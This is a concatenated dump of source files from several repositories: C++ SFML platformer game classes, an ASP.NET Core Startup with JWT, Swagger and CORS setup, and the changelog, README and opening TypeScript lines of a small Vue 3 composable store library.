Item::Item(int itemID, int stackSize) :
CollidableEntityDefault(EntityType::ITEM),
mAnchor(nullptr),
mStackText("", ResourceManager::getInstance().getFont(Constants::Files::Default_Font)),
mVelocity(0.0f, 0.0f),
mItemInfo(ItemDatabase::getInstance().getItemInfo(itemID)),
mDrawMe(true),
mStackSize(stackSize),
minventorySlot(-1) {
setShitUp();
}
void Item::setShitUp() {
mSprite.setTexture(ResourceManager::getInstance().getTexture(mItemInfo->imageFilename));
mSprite.setTextureRect(sf::IntRect(0, 0, 32 * mItemInfo->width, 32 * mItemInfo->height));
mStackText.setString(std::to_string(mStackSize));
mStackText.setOutlineThickness(1.0f);
mStackText.setOutlineColor(sf::Color::Black);
mStackText.setFillColor(sf::Color::White);
mStackText.setCharacterSize(12);
}
Item::~Item() {
}
void Item::tick(const sf::Time& deltaTime) {
if (mAnchor != nullptr) return;
mVelocity.y += Constants::Physics::Gravity*deltaTime.asSeconds();
mVelocity.y = std::min(mVelocity.y, Constants::Physics::TerminalVelocity.y);
mVelocity.y = std::max(mVelocity.y, -Constants::Physics::TerminalVelocity.y);
move(mVelocity);
}
void Item::draw(sf::RenderTarget& target, sf::RenderStates states) const {
if (!mDrawMe) return;
if (mAnchor != nullptr)
states.transform *= mAnchor->getTransform();
else
states.transform *= getTransform();
target.draw(mSprite, states);
if (mItemInfo->maxStack > 1)
target.draw(mStackText, states);
}
void Item::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
if (collidable->getCategory() == CollideCategory::WALL) {
mVelocity.x = 0.0f;
move(moveAway);
}
else if (collidable->getCategory() == CollideCategory::FLOOR) {
mVelocity.y = 0.0f;
move(moveAway);
}
}
void Item::setRenderLayer(int layer) {
mRenderLayer = layer;
}
int Item::getRenderLayer() const {
return (mAnchor != nullptr ? std::min(mAnchor->getRenderLayer() + 1, 200) : mRenderLayer);
}
ItemDatabase::ItemStruct* Item::getItemInfo() {
return mItemInfo;
}
void Item::anchorToEntity(Entity* entity) {
mAnchor = entity;
if (entity->getEntityType() == EntityType::INVENTORYSLOT) {
InventorySlot* invSlot = dynamic_cast<InventorySlot*>(entity);
minventorySlot = invSlot->getIndex();
}
else
minventorySlot = -1;
}
Entity* Item::getAnchor() const {
return mAnchor;
}
int Item::getStackSize() const {
return mStackSize;
}
void Item::addToStack(int size) {
mStackSize = std::max(mStackSize + size, 1);
mStackText.setString(std::to_string(mStackSize));
}
void Item::setMaxStack() {
mStackSize = mItemInfo->maxStack;
mStackText.setString(std::to_string(mStackSize));
}
void Item::setDrawMe(bool toDraw) {
mDrawMe = toDraw;
}
int Item::getInventorySlot() const {
return minventorySlot;
}
void Item::setInventorySlot(int slot) {
minventorySlot = slot;
}
<file_sep>#ifndef _INCLUDED_TILEMAP_H_
#define _INCLUDED_TILEMAP_H_
#include <SFML/Graphics/VertexArray.hpp>
#include <SFML/Graphics/Texture.hpp>
#include "Entity.h"
class CollisionManager;
class CollidableEntity;
class Wall;
class TileMap : public Entity {
public:
TileMap(CollisionManager* collisionManager);
~TileMap();
void removeVertices(int vertex);
bool load(const char* tileset, sf::Vector2u tileSize,int* tiles, unsigned width, unsigned height);
CollidableEntity** getWallHashTable();
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
private:
CollisionManager* mCollisionManager;
//static const int WIDTH, HEIGHT;
sf::VertexArray mVertices;
sf::Texture* mTileset;
sf::Vector2u mTileSize;
int* mTiles;
CollidableEntity* mWallHashTable[512*128];
};
#endif // !_INCLUDED_TILEMAP_H_
<file_sep>#include "CollidableEntityDefault.h"
#include <SFML/Graphics/RenderTarget.hpp>
#include "VectorMath.h"
CollidableEntityDefault::CollidableEntityDefault(EntityType entityType) :
CollidableEntity(entityType),
mGarbage(false), mSprite(sf::Vector2f(32, 32)),
mHitboxShape(nullptr), mCat(CollideCategory::IGNORE) {
mHitboxShape = new sf::RectangleShape(mSprite);
// Remove later
//mSprite.setOutlineThickness(5.0f);
mSprite.setFillColor(sf::Color::Red);
mSprite.setOutlineColor(sf::Color::Magenta);
// Remove to here
updateAxes();
}
CollidableEntityDefault::~CollidableEntityDefault() {
delete mHitboxShape;
}
void CollidableEntityDefault::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mSprite, states);
}
bool CollidableEntityDefault::garbage() const {
return mGarbage;
}
void CollidableEntityDefault::kill() {
mGarbage = true;
}
void CollidableEntityDefault::setSprite(sf::Vector2f size) {
mSprite = sf::RectangleShape(size);
delete mHitboxShape;
mHitboxShape = new sf::RectangleShape(mSprite);
updateAxes();
}
void CollidableEntityDefault::setSprite(float width, float height) {
mSprite = sf::RectangleShape({ width, height });
delete mHitboxShape;
mHitboxShape = new sf::RectangleShape(mSprite);
updateAxes();
}
CollidableEntity::CollideCategory CollidableEntityDefault::getCategory() const {
return mCat;
}
std::vector<sf::Vector2f> CollidableEntityDefault::getAxes() const {
return mAxes;
}
sf::FloatRect CollidableEntityDefault::getHitbox() const {
// Caveat: getGlobalBounds() already includes mSprite's own transform,
// so this assumes that transform is identity; otherwise it is applied twice
return getTransform().transformRect(mSprite.getGlobalBounds());
}
sf::Shape* CollidableEntityDefault::getNarrowHitbox() const {
if (mHitboxShape != nullptr) {
mHitboxShape->setPosition(getPosition());
mHitboxShape->setScale(getScale());
mHitboxShape->setRotation(getRotation());
return mHitboxShape;
}
return nullptr;
}
void CollidableEntityDefault::updateAxes() {
mAxes.clear();
std::size_t pointCount = mHitboxShape->getPointCount();
for (std::size_t i = 0; i < pointCount; i++) {
sf::Transform trans = mHitboxShape->getTransform();
sf::Vector2f v1 = mHitboxShape->getPoint(i + 1 == pointCount ? 0 : i + 1);
sf::Vector2f v2 = mHitboxShape->getPoint(i);
v1 = trans.transformPoint(v1);
v2 = trans.transformPoint(v2);
mAxes.push_back(VectorMath::normalizeVector(VectorMath::getNormal(v2 - v1)));
}
}
<file_sep>#ifndef _INCLUDED_WALL_H_
#define _INCLUDED_WALL_H_
#include "CollidableEntityDefault.h"
class TileMap;
class Wall : public CollidableEntityDefault{
public:
Wall(TileMap* tileMap, int quadVertices, int arrayPos);
~Wall();
int getVertex() const;
void setVertex(int num);
void setCollisionCat(CollideCategory cat);
virtual void tick(const sf::Time& deltaTime) override;
virtual void collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) override;
private:
TileMap* mTileMap;
int mArrayPos;
int mQuadVertices;
};
#endif // !_INCLUDED_WALL_H_
<file_sep>#ifndef _INCLUDED_MAPGENERATOR_H_
#define _INCLUDED_MAPGENERATOR_H_
class MapGenerator {
public:
static void generateMap(int* arr, int width, int height);
private:
};
#endif // !_INCLUDED_MAPGENERATOR_H_
<file_sep>#include "Wall.h"
#include "TileMap.h"
#include "Constants.h"
#include <SFML/Window/Keyboard.hpp>
Wall::Wall(TileMap* tileMap, int quadVertices, int arrayPos) :
CollidableEntityDefault(EntityType::WALL),
mTileMap(tileMap), mArrayPos(arrayPos) {
mCat = CollideCategory::WALL;
mQuadVertices = quadVertices;
}
Wall::~Wall() {
mTileMap->removeVertices(mQuadVertices);
}
int Wall::getVertex() const {
return mQuadVertices;
}
void Wall::setVertex(int num) {
mQuadVertices = num;
}
void Wall::setCollisionCat(CollideCategory cat) {
mCat = cat;
}
void Wall::tick(const sf::Time& deltaTime) {
}
void Wall::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
if (sf::Keyboard::isKeyPressed(sf::Keyboard::E)) {
mGarbage = true;
}
}
<file_sep>#ifndef _INCLUDED_GAMEMANAGER_H_
#define _INCLUDED_GAMEMANAGER_H_
#include "EventObserver.h"
#include <SFML/System/Clock.hpp>
namespace sf {
class RenderWindow;
}
class GameState;
class EventManager;
class GameManager : public EventObserver{
public:
GameManager();
~GameManager();
void run();
virtual void observe(const sf::Event& _event) override;
private:
bool initalizeGame();
bool initalizeWindow();
void close();
void gameLoop();
sf::Clock mClock;
sf::RenderWindow* mWindow;
GameState* mGameState;
EventManager* mEventManager;
};
#endif // !_INCLUDED_GAMEMANAGER_H_<file_sep>//#include "Constants.h"
//
//namespace Constants {
// namespace Block {
// const int Height = 32;
// const int Width = 32;
// }
// namespace Map {
// const int Width = 512;
// const int Height = 128;
// }
// namespace Physics {
// const float Gravity = 5.0f;
// const float ImpactBounce = 0.33f;
// const sf::Vector2f TerminalVelocity = { 3.0f, 4.0f };
// }
//}<file_sep>#include "Entity.h"
Entity::Entity(EntityType entityType) :
mEntityType(entityType) {
}
Entity::~Entity() {
}
<file_sep>#include "Player.h"
#include "VectorMath.h"
#include "MouseCursor.h"
#include "Constants.h"
#include <SFML/Graphics/RenderWindow.hpp>
#include <SFML/Window/Keyboard.hpp>
#include <SFML/System/Clock.hpp>
#include <algorithm>
#include <cmath>
static const float SPEED = 125.0f;
static const float ACCELLERATION = 2.7f;
static const float JUMP_SPEED = 3.5f;
Player::Player(sf::RenderWindow* window, EntityManager* entityManager) :
CollidableEntityDefault(EntityType::PLAYER),
mEntityManager(entityManager), mWindow(window),
mCursor(nullptr), mFriction(4.0f), mCanJump(false) {
mSprite.setFillColor(sf::Color::Blue);
mSprite.setOutlineThickness(0.0f);
setSprite(25.0f, 50.0f);
setPosition((float)mWindow->getSize().x / 2, -100.0f);
mCat = CollideCategory::PLAYER;
}
Player::~Player() {
}
void Player::setCursor(MouseCursor* cursor) {
mCursor = cursor;
}
void Player::tick(const sf::Time& deltaTime) {
// Skip physics on very long frames to avoid tunneling through walls
if (deltaTime.asSeconds() >= 0.25f)
return;
// Calculate movement
mVelocity.y = mVelocity.y + Constants::Physics::Gravity * deltaTime.asSeconds();
mVelocity.y = std::max(mVelocity.y, -Constants::Physics::TerminalVelocity.y);
mVelocity.y = std::min(mVelocity.y, Constants::Physics::TerminalVelocity.y);
if (sf::Keyboard::isKeyPressed(sf::Keyboard::A)) {
mVelocity.x = mVelocity.x - ACCELLERATION * deltaTime.asSeconds();
mVelocity.x = std::max(mVelocity.x, -Constants::Physics::TerminalVelocity.x);
}
else if (sf::Keyboard::isKeyPressed(sf::Keyboard::D)) {
mVelocity.x = mVelocity.x + ACCELLERATION * deltaTime.asSeconds();
mVelocity.x = std::min(mVelocity.x, Constants::Physics::TerminalVelocity.x);
}
else if (mCanJump) {
mVelocity.y = 0.0f;
if (mVelocity.x < 0) {
mVelocity.x = mVelocity.x + mFriction * deltaTime.asSeconds();
mVelocity.x = std::min(mVelocity.x, 0.0f);
}
else if (mVelocity.x > 0) {
mVelocity.x = mVelocity.x - mFriction * deltaTime.asSeconds();
mVelocity.x = std::max(mVelocity.x, 0.0f);
}
}
if (mCanJump && sf::Keyboard::isKeyPressed(sf::Keyboard::Space)) {
mCanJump = false;
mVelocity.y = -JUMP_SPEED;
}
move(mVelocity * deltaTime.asSeconds() * SPEED);
mCanJump = false;
}
void Player::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
if (collidable->getCategory() == CollidableEntity::CollideCategory::WALL) {
if (std::abs(moveAway.x) > std::abs(moveAway.y)) {
mVelocity.x = 0.0f;
}
else {
mVelocity.y = -mVelocity.y*Constants::Physics::ImpactBounce;
}
move(moveAway);
}
else if (collidable->getCategory() == CollidableEntity::CollideCategory::FLOOR) {
if (std::abs(moveAway.x) < std::abs(moveAway.y)) {
if (moveAway.y < 0.0f) {
mCanJump = true;
mVelocity.y = 0.0f;
}
else {
mVelocity.y = -mVelocity.y*Constants::Physics::ImpactBounce;
}
}
move(moveAway);
}
}
<file_sep>#pragma once
#include "Entity.h"
#include <SFML/Graphics/Sprite.hpp>
class Item;
class InventorySlot : public Entity {
public:
InventorySlot(int index);
~InventorySlot();
void setTexture(const char* filename);
Item* getContent();
void setContent(Item* item);
void setIndex(int index);
int getIndex() const;
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
private:
sf::Sprite mBackground;
Item* mContent;
int mIndex;
int mRenderLayer;
bool mGarbage;
};<file_sep>#ifndef _INCLUDED_BACKDROP_H_
#define _INCLUDED_BACKDROP_H_
#include "Entity.h"
#include <SFML/Graphics/Texture.hpp>
#include <SFML/Graphics/Sprite.hpp>
class Backdrop : public Entity {
public:
Backdrop();
~Backdrop();
bool load(const char* file);
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
private:
sf::Sprite mSprite;
sf::Texture mTexture;
};
#endif // !_INCLUDED_BACKDROP_H_
<file_sep>#ifndef _INCLUDED_PLAYER_H_
#define _INCLUDED_PLAYER_H_
#include "CollidableEntityDefault.h"
#include <vector>
class MouseCursor;
class EntityManager;
namespace sf {
class RenderWindow;
}
class Player : public CollidableEntityDefault{
public:
Player(sf::RenderWindow* window, EntityManager* entityManager);
~Player();
void setCursor(MouseCursor* cursor);
virtual void tick(const sf::Time & deltaTime) override;
virtual void collide(CollidableEntity * collidable, const sf::Vector2f & moveAway) override;
private:
EntityManager* mEntityManager;
sf::RenderWindow* mWindow;
MouseCursor* mCursor;
sf::Vector2f mVelocity;
float mFriction;
bool mCanJump;
};
#endif // !_INCLUDED_PLAYER_H_
<file_sep>#include "MapGenerator.h"
#include "simplexnoise.h"
#include <cmath>
#include <vector>
#include <SFML/System/Vector2.hpp>
float noise(float nx, float ny) {
return (raw_noise_2d(nx, ny) + 1.0f) / 2.0f;
}
float fBm(float x, float y, int octaves, float lacunarity, float gain) {
float amp = 1;
sf::Vector2f vec(x, y);
float sum = 0;
for (int i = 0; i < octaves; i++) {
sum += amp * raw_noise_2d(vec.x, vec.y);
amp *= gain;
vec *= lacunarity;
}
return sum;
}
float RidgedMultifractal(float x, float y, int octaves, float lacunarity, float gain, float H, float sharpness, float threshold) {
float result = 0.0f, signal = 0.0f, weight = 0.0f, exponent = 0.0f;
sf::Vector2f vec(x, y);
for (int i = 0; i < octaves; i++) {
if (i == 0) {
signal = raw_noise_2d(vec.x, vec.y);
if (signal <= 0.0f)
signal = -signal;
signal = gain - signal;
signal = std::pow(signal, sharpness);
result = signal;
weight = 1.0f;
}
else {
exponent = std::pow(lacunarity, -i * H);
vec *= lacunarity;
weight = signal * threshold;
weight = std::fminf(std::fmaxf(weight, 0.0f), 1.0f);
signal = raw_noise_2d(vec.x, vec.y);
signal = std::abs(signal);
signal *= weight;
result += signal * exponent;
}
}
return result;
}
float turbulence(float x, float y, int octaves, float lacunarity, float gain) {
float amp = 1;
sf::Vector2f vec(x, y);
float sum = 0;
for (int i = 0; i < octaves; i++) {
sum += std::abs(amp * raw_noise_2d(vec.x, vec.y));
amp *= gain;
vec *= lacunarity;
}
return sum / 2.0f;
}
void MapGenerator::generateMap(int* arr, int width, int height) {
float frequency = 15.0f;
for (int i = 0; i < width; i++) {
float nx = (float)i *0.15f + frequency;
float heightMap = RidgedMultifractal(nx / 4.0f, 1.0f, 8, 2.5f, 0.8f, 0.8f, 2.0f, 2.0f) / 2.0f;
for (int j = 0; j < height; j++) {
float yCoord = (float(j) / float(height))*4.0f;
float ny = (float)j * 0.15f + frequency;
if (heightMap >= yCoord) {
arr[i + j * width] = -1;
}
else {
float temp = noise(nx + 10.0f, ny + 10.0f);
float temp2 = noise(nx / 2.0f + 154.0f, ny / 2.0f + 884.0f);
//float temp2 = turbulence(nx / 20.0f + 154.0f, ny / 20.0f + 884.0f, 4, 2.5f, 0.4f);
if (temp2 <= 0.3f) {
arr[i + j * width] = -1;
}
else if (temp < 0.5) {
arr[i + j * width] = 0;
}
else {
arr[i + j * width] = 10;
}
}
}
}
}
<file_sep>#ifndef _INCLUDED_COLLIDABLEENTITY_H_
#define _INCLUDED_COLLIDABLEENTITY_H_
#include "Entity.h"
#include <SFML/Graphics/Shape.hpp>
#include <vector>
class CollidableEntity : public Entity {
public:
enum CollideCategory {
PLAYER,
PLAYER_PROJECTILE,
CURSOR,
ENEMY,
ENEMY_PROJECTILE,
WALL,
FLOOR,
IGNORE
};
CollidableEntity(EntityType entityType);
virtual ~CollidableEntity();
virtual CollideCategory getCategory() const = 0;
virtual std::vector<sf::Vector2f> getAxes() const = 0;
virtual void collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) = 0;
virtual sf::FloatRect getHitbox() const = 0;
virtual sf::Shape* getNarrowHitbox() const = 0;
};
#endif // !_INCLUDED_COLLIDABLEENTITY_H_
| d5925f26f97e9eb33163876388348b7c5aab5892 | ["C", "C++"] | 45 | C++ | TheBearmachine/Platformer | 50a83aa8400f031aa722b115125740b18b5d4f57 | b8707f9601a19a264e5912b0e27464c9c97c9954 | refs/heads/master |
<file_sep>using Chaos.Core.AuthHelper;
using Chaos.Core.Data;
using Microsoft.AspNetCore.Authentication.JwtBearer;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Mvc;
using Microsoft.EntityFrameworkCore;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.IdentityModel.Tokens;
using Swashbuckle.AspNetCore.Swagger;
using System;
using System.Collections.Generic;
using System.IdentityModel.Tokens.Jwt;
using System.IO;
using System.Reflection;
using System.Security.Claims;
using System.Text;
using System.Threading.Tasks;
namespace Chaos.Core
{
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
// This method gets called by the runtime. Use this method to add services to the container.
public void ConfigureServices(IServiceCollection services)
{
services.AddDbContext<ApplicationDbContext>(options =>
options.UseMySql(Configuration.GetConnectionString("DefaultConnection")));
services.AddMvc().SetCompatibilityVersion(CompatibilityVersion.Version_2_2);
#region JWT Token Service
// Read the token settings from configuration
var audienceConfig = Configuration.GetSection("Audience");
var symmetricKeyAsBase64 = audienceConfig["Secret"];
var keyByteArray = Encoding.ASCII.GetBytes(symmetricKeyAsBase64);
var signingKey = new SymmetricSecurityKey(keyByteArray);
// Token validation parameters; previously defined inline in AddJwtBearer, extracted here for reuse
var tokenValidationParameters = new TokenValidationParameters
{
ValidateIssuerSigningKey = true,//validate the issuer's signing key
IssuerSigningKey = signingKey,
ValidateIssuer = true,//validate the issuer
ValidIssuer = audienceConfig["Issuer"],//issuer
ValidateAudience = true,//validate the audience
ValidAudience = audienceConfig["Audience"],//audience
ValidateLifetime = true,//validate the token lifetime
ClockSkew = TimeSpan.Zero,//allowed clock skew on expiration
RequireExpirationTime = true
};
var signingCredentials = new SigningCredentials(signingKey, SecurityAlgorithms.HmacSha256);
// This collection simulates a user permission table; in practice it could be queried from the database
var permission = new List<Permission> {
new Permission { Url="/", Name="admin"},
new Permission { Url="/api/values", Name="admin"},
new Permission { Url="/", Name="system"},
new Permission { Url="/api/values1", Name="system"}
};
// If the third argument is ClaimTypes.Role, each element's Name is a role name; if it is ClaimTypes.Name, each element's Name is a user name
var permissionRequirement = new PermissionRequirement(
"/api/denied", permission,
ClaimTypes.Role,
audienceConfig["Issuer"],
audienceConfig["Audience"],
signingCredentials,
expiration: TimeSpan.FromSeconds(10)
);
// Configure the authorization service: the concrete rules and their permission policies (like access cards with different clearance levels)
services.AddAuthorization(options =>
{
options.AddPolicy("Permission", policy => policy.Requirements.Add(permissionRequirement));
})
// The authentication service must also be configured (JwtBearer default authentication here): a card alone is useless unless something can read it
.AddAuthentication(options =>
{
options.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
options.DefaultChallengeScheme = JwtBearerDefaults.AuthenticationScheme;
})
// JWT-specific configuration: how the reader identifies the card, to stretch the analogy (RFID vs. magnetic stripe)
.AddJwtBearer(o =>
{
// Do not require HTTPS for metadata
o.RequireHttpsMetadata = false;
o.TokenValidationParameters = tokenValidationParameters;
o.Events = new JwtBearerEvents
{
OnTokenValidated = context =>
{
if (context.Request.Path.Value.ToString() == "/api/logout")
{
var token = ((context as TokenValidatedContext).SecurityToken as JwtSecurityToken).RawData;
}
return Task.CompletedTask;
}
};
});
// Register the authorization handler
services.AddSingleton<IAuthorizationHandler, PermissionHandler>();
services.AddSingleton(permissionRequirement);
#endregion
#region Swagger
// Register the Swagger generator, defining 1 or more Swagger documents
services.AddSwaggerGen(c =>
{
c.SwaggerDoc("v1", new Info
{
Title = "Chaos API",
Version = "v1.0.0",
Description = "Chaos ASP.NET Core Web API",
TermsOfService = "None",
Contact = new Contact
{
Name = "<NAME>",
Email = string.Empty,
Url = "https://twitter.com/spboyer"
},
License = new License
{
Name = "Use under LICX",
Url = "https://example.com/license"
}
});
// Set the comments path for the Swagger JSON and UI.
var xmlFile = $"{Assembly.GetExecutingAssembly().GetName().Name}.xml";
var xmlPath = Path.Combine(AppContext.BaseDirectory, xmlFile);
c.IncludeXmlComments(xmlPath, true);
#region Token绑定到ConfigureServices
// Add header-based auth info to Swagger
//c.OperationFilter<SwaggerHeader>();
var security = new Dictionary<string, IEnumerable<string>> { { "Chaos.Core", new string[] { } }, };
c.AddSecurityRequirement(security);
// The scheme name ("Chaos.Core") is arbitrary, but must match the security requirement above
c.AddSecurityDefinition("Chaos.Core", new ApiKeyScheme
{
Description = "JWT authorization (the token is sent in the request header). Enter: Bearer {token} (note the single space between them)",
Name = "Authorization",//default JWT header parameter name
In = "header",//where JWT expects the Authorization info (the request header)
Type = "apiKey"
});
#endregion
});
#endregion
#region CORS
// Declare the CORS policies; remember to enable one of them in Configure below
services.AddCors(c =>
{
// Fully open policy
c.AddPolicy("AllRequests", policy =>
{
policy
.AllowAnyOrigin()//allow any origin
.AllowAnyMethod()//allow any HTTP method
.AllowAnyHeader()//allow any header
.AllowCredentials();//allow cookies (note: recent ASP.NET Core versions reject AllowAnyOrigin combined with AllowCredentials)
});
//the usual approach: restrict to known origins
c.AddPolicy("LimitRequests", policy =>
{
policy
.WithOrigins("http://127.0.0.1:1818", "http://localhost:8080", "http://localhost:8021", "http://localhost:8081", "http://localhost:1818")//multiple origins are supported; note: no trailing slash after the port (e.g. localhost:8000/ is wrong)
.AllowAnyHeader()//Ensures that the policy allows any header.
.AllowAnyMethod();
});
});
#endregion
}
// This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
public void Configure(IApplicationBuilder app, IHostingEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
// The default HSTS value is 30 days. You may want to change this for production scenarios, see https://aka.ms/aspnetcore-hsts.
app.UseHsts();
}
#region CORS
app.UseCors("AllRequests");
#endregion
app.UseHttpsRedirection();
#region Swagger
// Enable middleware to serve generated Swagger as a JSON endpoint.
app.UseSwagger();
// Enable middleware to serve swagger-ui (HTML, JS, CSS, etc.),
// specifying the Swagger JSON endpoint.
app.UseSwaggerUI(c =>
{
c.SwaggerEndpoint("/swagger/v1/swagger.json", "Chaos API V1.0.0");
c.RoutePrefix = string.Empty;
});
#endregion
app.UseMvc();
}
}
}
<file_sep># Changelog
All notable changes to this project will be documented in this file. See [standard-version](https://github.com/conventional-changelog/standard-version) for commit guidelines.
### [0.1.3](https://github.com/samzlab/vue-composable-store/compare/v0.1.2...v0.1.3) (2020-10-06)
### Bug Fixes
* return types from useStore() and context.use() ([2c2f34d](https://github.com/samzlab/vue-composable-store/commit/2c2f34dd04430310f36b60bebf2afca76a25eed4))
### [0.1.2](https://github.com/samzlab/vue-composable-store/compare/v0.1.1...v0.1.2) (2020-10-06)
### Features
* **plugins:** more tests and validations, full coverage ([65f4140](https://github.com/samzlab/vue-composable-store/commit/65f414007b9257580d924b021fca95feed5f97b6))
* **plugins:** plugin hooks (onInitialized, onUse, onAction, onMutate) [#1](https://github.com/samzlab/vue-composable-store/issues/1) ([750df52](https://github.com/samzlab/vue-composable-store/commit/750df5207115fa210fb2d7596e856de8619d0413))
* **plugins:** VueStorePlugin init moved to the install callback and now accept options ([f194e3d](https://github.com/samzlab/vue-composable-store/commit/f194e3db2dd452755fdcb5c02aeb2a03079ac996))
### Bug Fixes
* do not export store symbol ([dd52738](https://github.com/samzlab/vue-composable-store/commit/dd527388f4fdc27e850d0448f798708a9452f049))
### 0.1.1 (2020-10-04)
### Features
* initial release ([de4deee](https://github.com/samzlab/vue-composable-store/commit/de4deee131e842c8c561b98913a95f6654fe8468))
<file_sep>[](https://www.npmjs.com/package/vue-composable-store)  [](https://conventionalcommits.org) [](https://github.com/samzlab/tailwind-hsluv/blob/master/LICENSE) [](https://travis-ci.org/samzlab/vue-composable-store)
# Vue composable store
The original idea was [teased in a video](https://www.youtube.com/watch?v=ajGglyQQD0k) about the Vuex 5 draft by its maker (<NAME>). I never liked the current syntax, but this new API made me want to use it ASAP. So I started to implement it, for fun and for internal use in some hobby projects.
> It's not supposed to be a replacement for Vuex. It's just a fun project for me.
Currently it's pretty lightweight: **1.23 KB minified** (619 bytes gzipped) - *with stripped asserts*
It supports plugins, app-scoped stores and TypeScript.
> **Do NOT use it in production** environments. It's under continuous refactoring, and as soon as Vuex 5 is released it will be useless anyway.
## Peer dependencies
* Vue 3.0 or higher
## Installation
```
npm i vue-composable-store
```
> **NOTE:** There is a "hidden" production build in the dist folder which is ~30% smaller due to stripped asserts.
>
> ```js
> import { createVueStore } from 'vue-composable-store/dist/index-prod-es.js';
> ```
## Usage
> **The Options API is not supported!**
## defineStore() - the way you define your store
```js
import { readonly, reactive, ref, computed } from 'vue';
import { defineStore } from 'vue-store';
export default defineStore('shop', () => {
// state
const list = reactive([]);
const page = ref(1);
const limit = ref(20);
  // getters
  const hasNext = computed(() => {
    return list.length === limit.value;
  });
  // actions
  async function load(newPage) {
    // ...fetch data into `list`...
    page.value = newPage;
  }
// final store object
return {
hasNext,
list: readonly(list), // <---- in case you do not want it to be modifiable from outside
page,
load
};
});
```
## Compose stores (replacement for store modules)
```js
import { readonly, reactive } from 'vue';
import { defineStore, useStore } from 'vue-store';
// imported only in the store/component that composes it,
// so it can be properly code-split, tree-shaken, etc.
import cartStore from './stores/cart';
export default defineStore('shop', () => {
// state
const products = reactive([]);
  async function load(page) {
    // ...fetch page `page` of data into `products`...
  }
// final store object
return {
cart: useStore(cartStore), // <--- store composition instead of store modules
products,
load
};
});
```
```js
import { defineComponent } from 'vue';
import { useStore } from 'vue-composable-store';
import productsStore from './stores/products';
export default defineComponent({
name: 'ProductList',
setup() {
    // the store is lazily initialized on first use
const { load, list, hasNext } = useStore(productsStore);
load(1);
return {
list,
      hasNext
};
}
});
```
## createVueStore() - how you connect it to your app
```js
import { createApp } from 'vue';
import { createVueStore } from 'vue-composable-store';
import App from './App.vue';
const store = createVueStore();
const app = createApp(App);
app.use(store);
app.mount('#el');
```
# Plugins
Plugins can provide utility functions or data objects to be exposed in the store context.
```js
// api-plugin.js
export default (provide) => {
provide('api', (uri) => fetch(`https://localhost:5000/${uri}`));
}
// app.js
import { createApp } from 'vue';
import { createVueStore } from 'vue-composable-store';
import apiPlugin from './api-plugin.js';
import App from './App.vue';
const options = { plugins: [ apiPlugin ] };
const vueStore = createVueStore(options);
const app = createApp(App);
app.use(vueStore);
// optionally you can pass the `options` to app.use() as well;
// in that case the plugin list will be overridden
// app.use(vueStore, options)
// my-store.js
export default defineStore('my-store', ({ api }) => { // <-- `api` in the context
// you can use your api() plugin here...
return {};
});
```
### Hooks
The available hooks are passed in the second argument of the plugin function.
```js
// my-plugin.js
export default function myPlugin(provide, hooks) { /* plugin code */ }
```
The first two arguments passed to the callback functions are always:
* The `name` of the store which triggered the callback
* The `storeInstance`: the exact object returned from the setup function passed to `defineStore()`.
`onUse(callback: (storeName, storeInstance, context) => void)`
Called every time a store is accessed via `useStore()`, including when it is composed inside another store.
The `context` is the same one passed to the `defineStore()` setup function; you can use it to access or detect other plugins.
**Example:**
```js
// my-store-logger.js
export default function logger(provide, { onUse }) {
onUse((name, instance, context) => {
console.log(`Used: "${name}"`);
});
}
```
`onInitialized(callback: (storeName, storeInstance, context) => void)`
Called once per store per app, on the first use via `useStore()` (including composition).
```js
// my-store-logger.js
export default function logger(provide, { onInitialized }) {
onInitialized((name, instance, context) => {
console.log(`[Initialized] Store name: "${name}"`);
});
}
```
`onAction(callback: (storeName, storeInstance, actionName, actionArgs, actionResult, context) => void)`
Called after a store function (action) is invoked.
```js
// my-store-logger.js
export default function logger(provide, { onAction }) {
onAction((name, instance, action, actionArgs, actionResult, context) => {
console.log(`[Action invoked] Store action: "${name}.${action}"`);
console.log(` args: ${actionArgs.map(JSON.stringify).join(', ')}`)
    console.log(`  return value: ${JSON.stringify(actionResult)}`);
});
}
```
`onMutate(callback: (storeName, storeInstance, stateKey, value, oldValue, context) => void)`
Called when any watchable store property is mutated (its value changed).
```js
// my-store-logger.js
export default function logger(provide, { onMutate }) {
  onMutate((name, instance, key, newValue, oldValue, context) => {
    const oldJSON = JSON.stringify(oldValue);
    const newJSON = JSON.stringify(newValue);
    console.log(`[State mutated] "${name}.${key}" is being mutated from ${oldJSON} to ${newJSON}`);
});
}
```
## Changelog
See the [CHANGELOG.md](./CHANGELOG.md)
## License
Copyright © 2020 <NAME>
Licensed under the [MIT License](https://github.com/samzlab/tailwind-hsluv/blob/master/LICENSE).<file_sep>import { inject, Plugin, isReactive, isRef, watch } from 'vue';
function assert(valid: boolean, error: string): void {
if (!valid) { throw new Error(error); }
}
const
VueStoreSymbol = Symbol(),
// utils, shortcuts
isFunction = (val: unknown): boolean => typeof val === 'function',
isUndef = (val: unknown): boolean => typeof val === 'undefined';
export type StoreInstance = {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
[key: string]: any
}
export interface StoreDefinition<T> {
name: string,
// eslint-disable-next-line no-use-before-define
setup: StoreSetupFunction<T>
}
export interface StoreContext {
[pluginName: string]: unknown
}
export interface StoreSetupFunction<T extends StoreInstance> {
